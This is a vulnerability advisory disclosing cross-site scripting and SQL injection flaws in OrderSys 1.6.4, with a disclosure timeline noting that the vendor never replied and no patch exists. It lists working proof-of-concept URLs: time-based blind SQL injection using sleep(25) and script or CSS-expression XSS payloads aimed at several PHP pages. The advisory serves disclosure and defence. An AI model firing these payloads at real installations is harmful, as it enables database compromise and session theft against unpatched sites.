OrderSys 1.6.4 Cross Site Scripting / SQL Injection

`Information  
--------------------  
Name : XSS and SQL Injection Vulnerabilities in OrderSys  
Software : OrderSys 1.6.4 and possibly below.  
Vendor Homepage : http://www.bioinformatics.org/phplabware/labwiki/index.php  
Vulnerability Type : Cross-Site Scripting and SQL Injection  
Severity : Critical  
Researcher : Canberk Bolat  
Advisory Reference : NS-12-007  
  
Description  
--------------------  
The OrderSys system was originally developed at an academic research  
laboratory to simplify the filling of order forms that could be  
printed for handing over to a departmental office which processed the  
orders. The details for items and vendors, and order histories, could  
be stored in tables of a MySQL database, thereby saving time and  
effort of looking up catalog numbers, price, etc., budgeting, order  
follow ups, and preventing unnecessary ordering as well as  
illegibilities inherent to handwritten ordering. The system can be  
easily used for other purposes.  
  
Details  
--------------------  
OrderSys is affected by XSS and SQL Injection vulnerabilities in version 1.6.4.  
  
Example PoC urls are as follows :  
  
SQL Injection Vulnerabilities  
  
http://example.com/ordering/items.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3  
http://example.com/ordering/vendors.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3&submit_find=Find  
  
XSS Vulnerabilities  
  
http://example.com/ordering/items.php?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0007B1)%3C/script%3E&where_condition=3&order_condition=name%20ASC  
http://example.com/ordering/vendors.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))  
http://example.com/ordering/items.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))  
http://example.com/ordering/orders.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))  
http://example.com/ordering/interface_creator/index_short.php?table_name=item&function=details&where_field='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F1)%3C/script%3E&where_value=279  
http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F5B)%3C/script%3E&page=0&order=Name&order_type=DESC  
http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F79)%3C/script%3E&order=Name&order_type=DESC  
http://example.com/ordering/interface_creator/login.php?function='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F4)%3C/script%3E&go_to=(http%3A%2F%2Fubuntu%2Ftargets%2Fordersys%2Fordering%2Fadmin.php)  
http://example.com/ordering/interface_creator/login.php?function=admin&go_to='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000902)%3C/script%3E  
http://example.com/ordering/interface_creator/?function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C70)%3C/script%3E&page=0&table_name=vendor  
http://example.com/ordering/interface_creator/?function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C96)%3C/script%3E&table_name=vendor  
http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B34)%3C/script%3E&page=0&order=Name&order_type=DESC  
http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B3F)%3C/script%3E&order=Name&order_type=DESC  
  
You can read the full article about Cross-Site Scripting and SQL  
Injection vulnerabilities from here :  
  
Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/  
SQL Injection: http://www.mavitunasecurity.com/sql-injection/  
  
Solution  
--------------------  
No patch released.  
  
Advisory Timeline  
--------------------  
15/11/2011 - First contact: No response  
01/01/2012 - Second contact: No response  
22/08/2012 - Advisory Released  
  
Credits  
--------------------  
It has been discovered on testing of Netsparker, Web Application  
Security Scanner - http://www.mavitunasecurity.com/netsparker/.  
  
References  
--------------------  
MSL Advisory Link :  
http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-ordersys/  
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/  
  
About Netsparker  
--------------------  
Netsparker® can find and report security issues such as SQL Injection  
and Cross-site Scripting (XSS) in all web applications regardless of  
the platform and the technology they are built on. Netsparker's unique  
detection and exploitation techniques allows it to be dead accurate in  
reporting hence it's the first and the only False Positive Free web  
application security scanner.  
  
--   
Netsparker Advisories, <[email protected]>  
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/  
`